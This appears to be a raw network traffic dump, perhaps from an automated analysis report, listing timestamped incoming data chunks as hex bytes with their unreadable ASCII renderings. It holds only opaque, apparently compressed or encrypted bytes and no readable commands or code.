                                                                                                                                                            2022-09-29 12:45:15 UTC26613INData Raw: 70 1f 2b ef 18 d8 d3 14 ea fd 8e 17 4f 4b 70 c9 0f d5 57 1d 38 07 4c 45 44 01 d0 17 03 6d 68 f1 c9 64 3e b9 bc d5 ff 14 d4 9f db 7d 81 5a 81 3c c2 56 5c 71 44 5a b4 37 e5 e5 c6 8d a7 bc 99 ff ad b0 30 b1 15 88 a4 d5 51 5b 04 17 04 8b 55 3a cc 57 49 1e 62 9c c7 93 dc 6c e9 74 f3 a4 44 be 6a c5 ae 62 7b a3 ae 79 37 1a 41 13 e1 27 e5 e7 98 41 46 5c ef 38 56 97 2f f7 4a 57 7e 91 5e 21 d9 44 b1 71 de 3e 66 4f 9f d9 a4 9f bd 55 45 ea d3 23 3e 5a c5 35 c9 fa 84 f6 02 6e 96 f4 75 fb b9 c3 62 39 6f 28 5d bb e8 f2 22 23 10 1c 73 0e d9 78 e4 b8 46 49 a0 ed 08 c8 50 50 40 62 5a da bd 8c 2b 2d 0d 06 1a c9 e3 c1 35 71 96 63 20 57 b4 f1 69 4f 92 99 ac 07 9d 7b ad 51 4e ca 04 69 21 54 97 79 a1 a7 62 d1 73 31 31 e4 fd a7 4b 64 dc eb 76 a6 99 40 51 1a a5 d9 8c 2a 3a 01 12
                                                                                                                                                            Data Ascii: p+OKpW8LEDmhd>}Z<V\qDZ70Q[U:WIbltDjb{y7A'AF\8V/JW~^!Dq>fOUE#>Z5nub9o(]"#sxFIPP@bZ+-5qc WiO{QNi!Tybs11Kdv@Q*:
                                                                                                                                                            2022-09-29 12:45:15 UTC26629INData Raw: db 8a d6 8e 2f 8a b4 24 cf 35 a1 e8 33 09 7e 31 31 e4 e4 66 38 a8 73 d2 fa c7 11 a8 47 d3 f3 3e 5b 82 03 d8 c6 03 00 a6 0b 4e 4b 3e e3 a7 08 a0 b7 4a 82 1b 13 66 35 cc 6d fa 7b b4 79 f1 4b 0b 8d 00 65 8e e0 f5 88 49 1d 6f d5 7c 56 b4 26 f4 12 0b 7f 53 31 fb d8 d2 2e e5 73 23 16 a3 c0 d0 41 c2 8a ce 56 f0 ef a3 94 3d 33 3c bc df 50 ee b9 d6 cd 27 ed 8f 81 6b 24 0f ab 1b 3a 83 04 c3 75 6f a1 e4 41 83 f1 e6 66 b8 66 cc 93 b0 8d 4e f4 20 52 95 67 15 a8 cb 00 8a 19 26 48 96 96 fd 3d f4 7c 75 74 00 87 d7 ff cf d8 e6 0f 12 4c cb 70 55 1a fc 36 ae 5e af e9 05 c8 6a c9 08 af bd 65 41 df c7 8f 14 f6 bb ae bb a0 94 e5 91 23 15 a8 9b 07 d9 9f 02 49 20 57 0d 82 82 ff 1e a1 dc 46 63 ca d2 2f ce f5 59 36 c8 c0 e1 9a bd 63 b9 00 a1 47 83 9f ee 14 8d 3e 5b 16 ec 44 34 60
                                                                                                                                                            Data Ascii: /$53~11f8sG>[NK>Jf5m{yKeIo|V&S1.s#AV=3<P'k$:uoAffN Rg&H=|utLpU6^jeA#I WFc/Y6cG>[D4`
                                                                                                                                                            2022-09-29 12:45:15 UTC26645INData Raw: 6d f1 d5 e7 10 ab 69 71 b4 19 df 4b 8e 24 cd 06 51 16 94 73 03 34 cc b8 8d 26 20 80 2d 91 53 eb e8 1f 71 97 8e 02 8e ec 4a 1b 6d ba c6 1c 8e 2c 86 5b e2 b3 42 86 ee d3 3d 04 5d c6 e4 e3 6e a7 8e ea 7a b4 09 6d e3 f7 55 76 9b 8c bb a1 7d d6 66 4e f7 80 90 d7 ae c6 b5 cd cb f8 1a 78 17 56 b5 78 8a ae 30 8c 33 ef 3e a6 4c e7 0a 89 94 b1 4f 65 11 fe 32 76 2b d9 9d 40 ea dc 91 fc f4 57 ab 16 d0 84 a8 e8 76 08 40 ff 90 d7 57 99 35 44 22 14 ea 6f 57 45 a0 a6 a7 29 b3 b7 81 ec 4c be d5 7f 33 01 b3 20 c7 e1 cc 12 40 40 fa de 2e 5e e7 57 fd ea 68 86 c3 35 bb 63 9d 38 d9 9d 91 68 5a 9b 44 c2 6f 2c ae cc 48 59 99 e0 94 9e f4 df eb 31 c0 e7 c1 e2 69 b6 22 1b 2d eb 70 f4 3b 16 8b d4 ed 7f 4b a6 58 51 27 44 40 af fb 87 ba 8e 9a b0 fb 45 be b1 30 4b b6 04 c1 5c 6c c0 12
                                                                                                                                                            Data Ascii: miqK$Qs4& -SqJm,[B=]nzmUv}fNxVx03>LOe2v+@Wv@W5D"oWE)L3 @@.^Wh5c8hZDo,HY1i"-p;KXQ'D@E0K\l
                                                                                                                                                            2022-09-29 12:45:15 UTC26661INData Raw: 82 c2 f7 a4 cc 69 ef 81 2c a1 4b b1 dd cf 35 f4 67 01 b7 c4 e7 6b ce 23 e7 38 9e 05 e0 5b 86 7f b7 f7 98 31 98 55 3c eb 54 12 c8 17 25 ea 06 69 5c 69 66 20 76 c6 5c f4 6a 48 c6 f6 67 fb 64 df 15 78 a8 33 95 4e 69 c5 2b f6 9f 19 34 fa f4 97 8f 85 ec 1b a0 34 35 06 f3 a4 94 d7 b7 84 01 05 4e 7f 7a 1b 9e d7 78 58 38 67 7c 22 68 b6 8d c1 fd da 22 5d 9f 22 e4 53 62 88 a9 59 bf d7 54 b5 b9 d3 ac ae ed d1 c6 ae 20 0c e3 e4 2f e9 76 9d cb 21 da 12 87 ce db 1a 7b 76 6e 11 8c 8f b6 12 5e ac a4 df 16 9b 56 09 f9 9b 63 4e f4 c4 9e 52 fc 57 0c b6 ad 20 78 d9 cf 97 b4 25 fd 77 84 52 01 c6 24 16 cf b3 a1 bc 82 a3 7d 73 ed fe 5d 41 1c 9a c0 4e eb c5 84 68 ad 1a d1 fb ab 5d 1d 6f 55 c4 a6 c6 34 66 ca a7 9c 60 45 23 f6 19 ba cc a4 48 b6 97 c4 51 b0 8c 75 0b af 60 00 91 ee
                                                                                                                                                            Data Ascii: i,K5gk#8[1U<T%i\if v\jHgdx3Ni+445NzxX8g|"h"]"SbYT /v!{vn^VcNRW x%wR$}s]ANh]oU4f`E#HQu`
                                                                                                                                                            2022-09-29 12:45:15 UTC26677INData Raw: 0e 39 a4 ad 04 9d 83 58 07 5f 71 f0 7e d9 56 77 8b 15 ce d1 63 84 10 01 86 f9 e6 58 fa 24 a7 42 85 1f fe a5 f1 ef 18 f6 2c 52 fc e4 5f f7 77 73 f9 81 47 f7 9e e5 d9 7b 39 1f ce e2 d7 4b 5c ee 8e 15 59 a6 21 d0 b9 a5 2f 13 a8 f0 76 98 c3 fa 64 01 4f 47 75 12 47 5c 76 a5 21 62 18 98 b4 cd 57 17 97 70 46 f5 37 f4 f8 ae 17 71 02 70 38 fa 09 fc 3e 7c 49 fe 44 b9 c2 62 26 07 96 fd 2b 9e 58 44 95 84 8c a8 e5 dd a2 db 98 6c d9 a3 99 c4 fb a1 9f 7f 22 71 b6 21 a6 a2 93 03 98 cb 61 64 8d bf 6b 5f a2 2a 3f 3a ce 29 c9 30 d2 a7 22 d4 a9 18 81 85 b0 99 b6 26 99 bf 16 33 e3 06 70 de c4 73 46 74 60 53 c2 04 78 b6 be c9 8e ca 97 a6 ff 41 3a 13 22 a7 3a e6 5c 0e 69 b0 cd 3c 2a 29 1f 43 aa 0c 64 ef f2 e9 72 6f 6c e5 73 ba 98 5a bc 27 71 ff fc 7f be 96 dd 4e a4 ee 0f de 18
                                                                                                                                                            Data Ascii: 9X_q~VwcX$B,R_wsG{9K\Y!/vdOGuG\v!bWpF7qp8>|IDb&+XDl"q!adk_*?:)0"&3psFt`SxA:":\i<*)CdrolsZ'qN
                                                                                                                                                            2022-09-29 12:45:15 UTC26693INData Raw: 8d ee ca f0 4f 2e 70 88 e0 f4 b1 7f 13 6f c6 99 e3 e6 fb d6 0f 63 38 da 39 19 4b 9e d9 1d fd 2c ca 09 c1 0a 9a 8c 43 f5 31 07 15 61 54 ec 24 e6 41 06 a9 b9 a4 57 8c 86 c7 27 2b 41 9a 96 89 63 5d 37 6f 28 69 f3 82 4a 45 61 8c 8a b6 00 2f 08 75 ba e1 4f 45 33 2f 0c 83 a9 ee b4 43 b5 41 1f 74 e6 fa c6 fe 9a cf a2 0b 6f bb 8d 31 f9 de ad 9f 9b 60 9f e4 14 e4 16 23 ab a2 8e 0a 36 ad e9 d3 42 b3 c7 02 bb 05 53 df 8a 6d 46 09 85 0c 9b 91 9b 77 74 ca 91 3e 4e 39 58 2c 0e 00 25 0d 74 40 11 8f cc 65 6a f1 47 b9 59 20 d7 84 10 3a 7e 2e e5 a0 fa 79 a3 13 9e 2b 0c ba 0d 93 e8 ea 7b d6 1b d1 98 6b 29 c0 57 95 04 db ff 4d 55 bf de be 34 54 4d 19 84 75 b6 40 b7 86 69 84 ed 06 f5 d1 d3 b2 bf 63 69 ea 7f f0 56 95 89 b6 8b fd 0f ee 2d 32 c0 df d9 14 f8 dd 3b d1 78 95 69 06
                                                                                                                                                            Data Ascii: O.poc89K,C1aT$AW'+Ac]7o(iJEa/uOE3/CAto1`#6BSmFwt>N9X,%t@ejGY :~.y+{k)WMU4TMu@iciV-2;xi
                                                                                                                                                            2022-09-29 12:45:15 UTC26709INData Raw: 08 1e e4 3f 8b aa 94 3d f2 5e 18 dc df e2 47 a5 36 01 a0 05 17 32 0f 0d e9 88 18 42 c4 ce 2e ff 8c dd e7 f6 22 7e 10 b4 43 27 04 2c 18 f2 28 f7 b2 ae 89 c3 56 38 ef 7e 71 b6 ee ec 06 fd ca ec ef 24 4a d5 87 82 33 8e 9b e5 35 52 35 69 1f e9 06 32 d7 db b2 72 4e 20 58 99 d5 46 cb f6 d9 a0 80 d9 26 a1 bc c2 d5 0e a0 59 94 e1 da 1d b3 50 82 5d 04 d9 34 10 f6 46 f2 31 4c 8f 0b 26 30 32 58 34 9a 51 23 32 1c 47 06 8c 2e e6 d9 d3 e9 35 24 1f 84 d5 dc 84 af 02 6c 79 03 d9 4d 94 07 69 01 66 a7 f6 03 82 4c 33 b0 48 94 2b 0f 3d 96 3e 2a e5 63 55 c8 60 4c a5 42 fc 23 f0 1f 3d c1 3d 1d 63 6a 7e 81 e8 c8 1b 7b b6 e9 c8 8b 86 ca 49 b7 ed fb 44 6b 5b d0 a2 f1 db f4 63 01 f6 5c 70 46 00 09 37 25 51 be 5e 16 01 5d e7 2b 58 6f 99 42 a4 a9 6d df 0d ff db 6e d7 7d 3e ca b5 a7
                                                                                                                                                            Data Ascii: ?=^G62B."~C',(V8~q$J35R5i2rN XF&YP]4F1L&02X4Q#2G.5$lyMifL3H+=>*cU`LB#==cj~{IDk[c\pF7%Q^]+XoBmn}>
                                                                                                                                                            2022-09-29 12:45:15 UTC26725INData Raw: dd 1e 28 18 3d 8b fe 85 84 2c 6f a8 5d 87 a1 b0 ab 2f 6f fc 90 9a f8 3b c4 a5 6c 32 90 f6 47 31 be 54 f2 98 a2 f9 a8 d9 21 cf 5f f6 1d 65 e4 b3 26 07 3f a1 d7 e1 ae 5a e8 32 21 ee 12 da f3 07 ee 69 d6 c9 91 38 e3 e1 dc 8d 50 22 aa 02 b8 b6 ef 4e 3e 19 fa 89 74 53 f3 d0 03 ff 80 c1 ef 95 98 c0 09 13 00 c3 38 1c 7a 2d 64 25 12 c5 92 92 e0 b8 32 8a 44 3f 91 09 bc e0 eb 7b a0 bd ee 24 c6 9b 85 76 32 e7 2f 66 a7 70 76 6c fc c8 de b2 0b b3 e2 f3 34 84 ab 55 3e 18 6a 45 55 50 ec af 3c 5f 53 aa 10 d0 58 70 8b a1 6c 82 e7 c5 5d 57 b0 95 06 2e 60 f5 58 50 74 1a 2c 80 18 90 5b 9b a3 ad e3 8e 12 db b0 3f 10 19 b9 05 a4 df d1 93 bc 24 7d 75 ee a2 d5 56 85 bb 38 12 cc 0b 77 80 81 7b 4d 04 27 8a 6c bd 86 ec fa ed 24 45 53 1e 9e 0c b1 35 43 54 bc 34 36 e8 32 64 81 2d 5f
                                                                                                                                                            Data Ascii: (=,o]/o;l2G1T!_e&?Z2!i8P"N>tS8z-d%2D?{$v2/fpvl4U>jEUP<_SXpl]W.`XPt,[?$}uV8w{M'l$ES5CT462d-_
                                                                                                                                                            2022-09-29 12:45:15 UTC26741INData Raw: 7d 76 3e 2f 39 95 65 21 9b 85 62 7c 09 2f 0e 55 fc 60 46 14 2f a3 57 cf 8d e7 62 08 75 aa 29 7a 70 8e 0e 9f 41 33 de e2 98 b6 3c e7 42 ae 9b 57 f8 8f 38 1e 11 c4 cc 60 72 9b 04 87 35 8c a1 06 80 5c d7 35 57 e8 52 8f 68 4a b2 80 17 58 9c 4e a2 45 38 ac 06 c5 ff 0a 5c d6 00 ef 15 db c5 48 96 a3 74 66 be 18 97 24 87 91 dc ae ca 30 24 25 47 7a 47 fa 35 1c b7 17 a1 39 67 04 9d 2e 7a 7d 4f 52 56 5a 71 fb c2 74 bb e5 0b 4e 88 1c 0a b5 02 a7 c0 a0 5c 27 d6 ac 16 fc 2d e4 88 b2 ca 36 3e cb 50 65 b6 64 bb 5f de 39 b1 e5 ac b4 e6 e6 a9 8d 4a 6a 62 ab cf 2c 01 a6 23 54 12 ee 16 77 95 72 27 5b b9 ac 16 f6 f7 1f a0 15 69 e4 0e 01 35 2c a2 34 ef d6 8d e4 24 47 94 f7 28 66 d2 42 77 11 d0 31 81 77 f5 e5 96 0b cf 28 6e be d3 0e be fe c6 e5 21 d2 70 e0 03 69 44 80 7b 24 81
                                                                                                                                                            Data Ascii: }v>/9e!b|/U`F/Wbu)zpA3<BW8`r5\5WRhJXNE8\Htf$0$%GzG59g.z}ORVZqtN\'-6>Ped_9Jjb,#Twr'[i5,4$G(fBw1w(n!piD{$
                                                                                                                                                            2022-09-29 12:45:15 UTC26757INData Raw: cb 42 db 57 76 04 16 f8 7e e6 4d 64 d5 7c 63 fe 9f d2 4f ac 91 5b 6c 86 60 41 21 22 6e 79 59 4d 63 2c 9e 71 30 41 ac 16 c4 e0 2d b0 b7 08 35 d1 39 22 b4 bb df 28 38 ad 7b b6 27 e0 6e eb 00 5b 96 17 15 2e 7b 1f f2 be d3 a0 92 0b 37 3c 5a 44 3c 8b d9 87 bb 10 52 d7 83 a3 60 e7 ee 3d 4f 6f 1b b6 9e 7e c5 c9 76 57 cc e0 f4 8f 23 bc 4c 78 be 48 00 f5 88 b0 c7 94 57 59 6c d5 e3 22 e9 fb ae c0 59 4f 31 2d 09 6a 83 54 d1 02 11 75 73 4e f3 ab d7 d9 47 3a ea 19 70 16 a3 5a e5 bd 7f ee a8 53 65 39 4b dc 45 74 57 3b 24 98 de c0 c4 df a7 51 0e 3e 88 f0 b9 47 4b 89 96 a2 84 50 b2 6d ee 31 09 f2 11 86 d4 72 08 fa 0a 2c 13 12 81 40 20 30 5c 6f fa fb d6 87 c0 1c dd 8f af a1 53 5e 95 13 bb 54 b5 b0 1e f9 3f b6 44 0b e4 8c c8 48 43 87 ef 32 2b 8f eb 13 1c f7 81 fb 38 ea 0d
                                                                                                                                                            Data Ascii: BWv~Md|cO[l`A!"nyYMc,q0A-59"(8{'n[.{7<ZD<R`=Oo~vW#LxHWYl"YO1-jTusNG:pZSe9KEtW;$Q>GKPm1r,@ 0\oS^T?DHC2+8
                                                                                                                                                            2022-09-29 12:45:15 UTC26773INData Raw: 04 9b 4c af 3d b5 fc db 52 cf f2 b3 64 41 7d 97 66 ae 09 dd 57 0e 82 eb fc aa ea d2 ea 37 36 c1 c4 bf 70 88 09 e6 0c 71 ef 7f c9 53 a3 f1 af 99 1d f2 4b c0 dc 7e 79 0a e0 06 40 21 82 69 0f 70 d5 6c 4c f5 c2 9d 90 bd 0f 4b f2 f9 1f 7c 6c 4f 68 44 22 33 99 fc 3e 6d 2d 41 79 c1 a5 9a 3f 9f a9 f2 63 b6 90 84 e7 d7 8a 8a 1e 89 ee 3d 1d 81 40 35 a5 27 9a 45 5d b6 84 ba c3 e8 77 56 8b 98 58 50 4d 86 39 12 a4 77 62 12 3d ae 71 ff 52 66 7a 81 10 d3 46 92 6d a9 01 48 99 bb 1d f4 61 45 25 90 89 13 d4 3b 05 95 10 78 66 3d f8 ed 47 6c 24 03 b6 f0 a9 26 46 ec d9 ff 14 2b 84 3d 49 0d da eb 0c 79 3e 66 eb 53 0f ec 14 6e 15 0c 03 f8 98 5a 2f b5 8e 89 35 b7 a6 45 da c1 93 50 fe a7 80 91 db 0c 0b 59 37 48 cf 86 6b 6a a7 4c 72 10 4d 79 dd 05 2e 70 36 e4 08 43 b1 e6 8b 6b 0f
                                                                                                                                                            Data Ascii: L=RdA}fW76pqSK~y@!iplLK|lOhD"3>m-Ay?c=@5'E]wVXPM9wb=qRfzFmHaE%;xf=Gl$&F+=Iy>fSnZ/5EPY7HkjLrMy.p6Ck
                                                                                                                                                            2022-09-29 12:45:15 UTC26789INData Raw: d6 80 d5 8d b5 42 5e 31 44 2a f4 70 9d c8 76 0a 76 c7 2c 9b ad 78 c2 85 0f c3 4b 85 24 b8 f2 85 b0 7d 9b 52 5a 66 a2 01 3e b1 97 2c 58 14 77 e7 8f 14 94 24 6e c6 67 80 bd 39 4e 15 07 4c 71 b6 95 de e3 90 e9 69 92 3c f7 7a f9 7c 52 17 c5 df 41 a9 6c 89 43 82 a4 be 65 10 8d 19 a5 6e 79 67 de e8 93 09 ef 8a a5 7e fc 8c d6 9c 1e cc 71 00 10 7a eb 6a 0d c2 81 ae ff 1b c5 8a 0e 70 2a c5 c6 be 8a a6 d7 20 46 cd ee 44 b4 07 be 22 77 ee 2d 14 fa db ef 8a 17 5d ef 96 52 59 65 df b6 97 fb 84 45 3a f4 97 12 58 f0 a9 d6 43 cd 2d 2c 42 bd 7b e4 8a 91 52 28 72 32 e6 4d 88 d8 08 55 4f 53 20 6f d1 46 c7 11 14 1d 69 d7 22 f2 d8 08 1f 08 4d 40 c0 27 82 b0 af 0c 3a eb 67 5e 21 59 a9 39 42 d2 b3 1b 41 f8 19 e7 27 b1 58 5b b6 3d 93 56 ae 48 40 a0 49 d0 47 f1 90 ec a9 a4 95 17
                                                                                                                                                            Data Ascii: B^1D*pvv,xK$}RZf>,Xw$ng9NLqi<z|RAlCenyg~qzjp* FD"w-]RYeE:XC-,B{R(r2MUOS oFi"M@':g^!Y9BA'X[=VH@IG
                                                                                                                                                            2022-09-29 12:45:15 UTC26805INData Raw: 77 f9 d4 cc b9 3a 2b 61 1d 5c e4 2d d8 d4 25 aa de a6 3f 73 b9 e5 7a 1c 60 dc cb 2b 65 82 64 3a 18 cb 5c 58 c6 27 2c df db 76 f0 f9 91 00 e9 38 5b e9 ad 99 16 a2 aa 14 79 98 64 eb 1b 38 83 e4 28 11 c5 cc a9 c8 10 13 2c 32 7d 44 4c 81 f0 4c 83 f8 39 f2 3b 36 2e eb 3b b7 6c b5 1d 22 89 1f 89 4b a9 39 8b 52 8b 69 3d d4 a3 34 ca df 70 c9 4a ff 39 95 e4 2b dd d4 e0 3e 9a a7 46 42 36 24 3f 42 20 f6 9f 3e 8d 86 9b 3c c0 87 f0 78 44 62 0f 86 f2 53 6c 8b 92 79 85 a0 f6 5c 79 32 b5 ca a7 c1 02 d5 e8 09 83 7a 0c 04 4b 56 74 eb 35 68 66 21 a5 29 6e ae 0c 4c 01 1c fb 47 7a 63 14 31 87 cd 63 23 5f d8 7e a5 b4 c5 66 ac 47 17 20 9e f4 6b bb 91 da 23 95 53 6f 22 cc 5a 97 36 71 46 fb f2 6c a3 a5 70 0a f5 33 f1 17 5d 91 11 d0 33 e1 99 6b 30 a9 bb 59 3c a5 8f ec 3c 95 df b3
                                                                                                                                                            Data Ascii: w:+a\-%?sz`+ed:\X',v8[yd8(,2}DLL9;6.;l"K9Ri=4pJ9+>FB6$?B ><xDbSly\y2zKVt5hf!)nLGzc1c#_~fG k#So"Z6qFlp3]3k0Y<<
                                                                                                                                                            2022-09-29 12:45:15 UTC26821INData Raw: f4 a2 eb ce 74 17 e8 fc ba dc cf f0 f3 a9 de e4 65 f3 f1 00 40 17 7d e1 aa 8a 9d ed 12 d0 a1 f8 43 92 e1 76 67 65 ca bf b7 a8 c1 bf 1d 8f 24 3a 55 e2 c8 15 31 f5 21 74 af 41 33 71 f1 c5 0e 85 5e aa 8b 19 42 21 94 60 93 3a 3b d6 81 55 d0 42 92 49 71 1e c2 5a 6d f1 15 73 fb c4 87 dd 7f 3a 7d aa 47 93 28 b6 25 5b 58 87 4c c3 3d 75 37 35 e6 b1 e4 3f 17 5e 7e bc 2e 04 1c c6 1f 0e 66 20 d7 b8 6f 0a 26 12 1c 73 0d 1e 11 f5 f5 bf 06 c6 bd ab 48 1c 6f 6d 23 ac db 85 a6 d2 3c 2d dd 68 41 f9 eb 01 ab c6 ca 30 bb 51 94 52 18 67 b0 45 71 0e f7 8c 86 f3 77 92 4d 25 0b d1 25 88 51 f8 a0 ed f8 0f 82 d9 74 d7 01 87 53 19 99 91 dd 24 12 58 43 9b f9 6c f3 94 03 ff 38 29 3f a9 21 fd d9 1b b5 16 0c 8e 19 31 a9 99 40 3f dd c9 29 9c f8 6a d8 4f 18 18 a1 45 ce ec 1b 24 63 b7 91
                                                                                                                                                            Data Ascii: te@}Cvge$:U1!tA3q^B!`:;UBIqZms:}G(%[XL=u75?^~.f o&sHom#<-hA0QRgEqwM%%QtS$XCl8)?!1@?)jOE$c
                                                                                                                                                            2022-09-29 12:45:15 UTC26837INData Raw: 7d 6d 07 3a 90 f5 56 ee d6 ef 1e 20 26 8e 70 de e9 45 d1 c9 fc d2 89 db e2 82 fb 11 f7 45 62 2e 2f 2a 3e 29 7e f4 8b 58 66 56 8e 18 ea 31 b1 04 4f e2 a7 ec 5b af 43 01 d8 a2 3f 87 cd 7d 4a cd a9 e4 85 48 98 23 23 00 6e aa ad 8e 8d fc ac f2 89 a5 3b 28 57 2c e6 75 d2 67 51 d8 b1 4e 75 d4 3b 58 4b 1c a9 71 49 b6 e1 36 fa 52 74 69 ca 10 e8 97 79 4d 89 85 ee 12 35 eb 59 02 e7 62 a9 00 2c 2a 92 bc 29 73 4a 47 e0 b5 8d 4f ee 96 71 3c 88 00 74 a4 2a a0 ae 31 dd 9b 51 1e 2a 30 f7 15 6c 29 94 f7 ed 02 20 73 56 85 3f 36 89 f9 35 0a 2f b7 e1 5c a1 79 8b 60 84 65 a3 05 c1 da 15 3d 93 f0 12 54 8e 5c 8a 9a 2b 16 a5 35 8f 11 6c d1 d7 29 cc 53 34 45 d5 dc 47 99 9d 63 df cf f5 d3 e2 e4 7d 65 fe 81 c0 8d d7 02 9f f3 56 f8 e9 49 ec c0 e6 04 00 02 30 39 d0 55 a8 a1 3f 04 f2
                                                                                                                                                            Data Ascii: }m:V &pEEb./*>)~XfV1O[C?}JH##n;(W,ugQNu;XKqI6RtiyM5Yb,*)sJGOq<t*1Q*0l) sV?65/\y`e=T\+5l)S4EGc}eVI09U?
                                                                                                                                                            2022-09-29 12:45:15 UTC26853INData Raw: 8a c2 9e ed 51 b4 e9 d3 6f 93 ca 80 15 6f 2c 39 0a 52 36 d0 b2 fb 36 36 52 8c 06 f2 b4 5b 2e 56 b6 46 8d 3a 7f 6b e0 83 14 de a1 97 e5 13 06 0c 2a 3b f6 0d 59 66 02 be e4 26 9f 4a c9 fe 63 37 df 88 89 40 d2 19 8e e4 47 2d 99 c7 86 b9 9d 8b bd 2d 56 d9 d9 08 11 9e ea 47 7c e3 7d f0 cd 8a e6 a8 c0 3e 62 57 f1 72 b7 dc ae 9a 97 69 ec 70 f9 8d 22 43 18 0b d4 5e e1 c7 7e 30 fd e5 89 2d 4a 8b dc 6d 80 6e 73 2c a7 ec 50 f8 95 56 2e 9c 45 12 d2 02 34 27 a0 72 2d 6f fc 9b 19 4b e8 05 43 e4 57 41 a2 09 86 06 92 61 b6 19 22 73 dd 22 5d f7 00 10 36 b2 0d 07 10 62 0e 11 70 ae da 13 da 4f 9c a8 37 63 7e ea 6d 79 e0 30 e2 ef 44 d2 33 50 20 28 5a 01 05 aa 4b 47 93 eb 63 15 93 14 aa 77 4d f2 92 a6 0c e2 18 cb f9 e6 d7 d1 78 39 7b 64 16 5f 20 2f 1a 62 e6 7c ae a2 11 77 0b
                                                                                                                                                            Data Ascii: Qoo,9R666R[.VF:k*;Yf&Jc7@G--VG|}>bWrip"C^~0-Jmns,PV.E4'r-oKCWAa"s"]6bpO7c~my0D3P (ZKGcwMx9{d_ /b|w
                                                                                                                                                            2022-09-29 12:45:15 UTC26869INData Raw: 59 bb 7a fb df ac e6 d5 2a 9a c1 0c 7f 89 d4 c4 01 2b bb 9e 5c af 9c 85 09 f1 bf 9e 22 21 4a 87 11 29 54 18 b5 fe ec 83 d6 65 04 e8 24 33 8e ee 01 b5 2d 9a a2 3d a1 3f 7e 4c 0f 43 7c 3f 72 09 64 14 5f 69 b6 46 40 86 01 e9 15 95 ec fe cb fc dd f6 85 ae e4 1a 35 43 82 1b be 11 71 16 a8 df be e4 71 1a 2b 78 29 c0 83 ba 7c 66 02 48 e7 e0 43 fb dd a9 1d bd 67 b7 46 0f 27 f4 00 6d 8d 91 14 0b c3 3a 33 9b 3c 9f 9f 29 64 2d 20 bf 8b 68 c0 ef 6c 45 a1 93 fb e6 27 80 8e 13 2e d2 e9 24 28 20 f7 77 41 c5 ef f8 55 2a a7 2d 38 7b 25 b9 16 cc 6b 70 6a 89 0c ee dc d6 db 35 a4 08 93 dd 52 a2 51 ac 87 60 8e 1b 40 38 bf 90 a0 bf e8 e1 d9 9f 37 c1 5d f8 1c b6 5b ee f7 09 ad 18 1e 6c cf 92 5b 59 3f 02 33 c0 83 b8 bf 96 c6 47 1b 0f de 24 97 1c 57 b5 d5 ff 98 ef e3 00 8f 74 95
                                                                                                                                                            Data Ascii: Yz*+\"!J)Te$3-=?~LC|?rd_iF@5Cqq+x)|fHCgF'm:3<)d- hlE'.$( wAU*-8{%kpj5RQ`@87][l[Y?3G$Wt
                                                                                                                                                            2022-09-29 12:45:15 UTC26885INData Raw: c4 1b 28 95 f6 f9 b0 c2 a7 3d db e2 af 07 fe 20 b8 70 02 d5 07 12 e8 59 43 91 30 6c 64 31 c9 30 56 19 a7 f6 a4 66 f9 25 04 8a a4 7d 50 0a b6 91 b0 24 b2 5f 4d 49 9d 2d 14 1b 8b 49 3a 7d d3 ad 8f b8 b2 11 8e 4b f6 38 b5 8a 7c b9 05 ce c8 78 03 c6 35 19 60 3f 56 7e dc 19 29 95 10 4b 57 76 d0 d7 c0 35 85 bf c5 d9 2f ff 3d ac 2f 55 74 e7 a5 e6 be da 60 4a 89 13 26 59 40 d7 32 8d 07 ce fa a2 3e 93 86 1e e5 15 12 89 79 07 fd 94 bd 79 92 e9 39 65 ae d2 73 13 04 09 b8 80 f1 c0 e5 36 f9 ce ee cc 15 fb 33 0d 67 34 a7 af 49 dc 1d 43 1a d1 15 17 71 27 ec 4f 31 7a 77 0c 35 a8 69 7e 08 34 a0 4f 38 b9 a6 ec f2 1e 55 62 72 1d 95 75 f6 3f 2d 74 5d ec 52 1c 3d 9b 55 eb 67 84 b0 e1 f1 2e ba f4 a7 ae 77 25 b9 93 1d 99 92 5e c9 16 e2 d0 e7 74 ab 1f 0a 75 b3 50 5b 70 68 e7 5c
                                                                                                                                                            Data Ascii: (= pYC0ld10Vf%}P$_MI-I:}K8|x5`?V~)KWv5/=/Ut`J&Y@2>yy9es63g4ICq'O1zw5i~4O8Ubru?-t]R=Ug.w%^tuP[ph\
                                                                                                                                                            2022-09-29 12:45:15 UTC26901INData Raw: e6 6c 08 63 8f 13 60 b4 a1 5b aa a1 bb 72 6a 12 8a d0 78 d1 f5 f3 3f db 5d e3 c6 d6 07 71 cf 0f 6b 58 91 f8 26 42 a8 fd c8 d5 91 6f e2 58 23 66 23 63 4e 6a d8 dd e8 41 0d 9d 91 74 2f 5a 2e de 17 98 0b 28 75 34 dd 8c df 07 81 ce f3 22 17 43 5e 25 f0 84 d6 f7 ec af 31 8b bd 6f 2f eb 77 d8 bf fd 0f 0d 5d 2b cd b9 2b b9 e9 d0 88 ce d2 69 7e 3f ba b8 9d b3 23 19 98 00 6b 89 b4 62 72 2f 1d 3e d0 fb 2b b9 9c 8f 3f 3e 23 6b 60 8e ae a5 8f 10 6d 8d a2 79 3a a3 51 93 55 25 3a 73 32 c9 82 d5 58 41 77 ed c6 99 b2 c5 cc 26 7e db 9e 40 1f f7 ea d2 db dd d7 8d 6a e4 19 ca b2 8e ba f8 e0 70 48 bf d7 d0 46 d4 02 f3 7f 26 a8 fd a4 3b 7e b6 c0 96 01 af 48 3f a4 cf 52 2e ed 9a 33 cd c0 24 9f 42 6c 3a ee e3 2c f5 d9 27 af 8b 84 33 d0 2c 2e 01 cd 4b 89 60 77 80 06 9a 91 f5 a9
                                                                                                                                                            Data Ascii: lc`[rjx?]qkX&BoX#f#cNjAt/Z.(u4"C^%1o/w]++i~?#kbr/>+?>#k`my:QU%:s2XAw&~@jpHF&;~H?R.3$Bl:,'3,.K`w
